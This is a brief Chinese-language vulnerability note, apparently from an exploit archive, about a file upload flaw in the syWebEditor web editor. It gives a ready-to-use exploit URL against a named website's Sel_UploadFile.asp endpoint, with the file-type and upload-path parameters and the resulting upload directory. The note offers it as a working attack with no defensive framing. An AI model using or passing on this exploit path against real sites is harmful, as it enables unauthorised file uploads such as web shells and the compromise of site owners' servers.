syWebEditor编辑器存在上传漏洞,也是解析的问题,跟其它出现这漏洞的
编辑器一样。
exp:http://www.tmdsb.com/syWebEditor/Sel_UploadFile.asp?obj=ProPhoto&fileType=gif%7Cjpg%7Cpng%
7C&filePathType=1&filePath=/PhotoFile/ProFile/
上传后的目录/PhotoFile/ProFile/。有个自动改名的选项。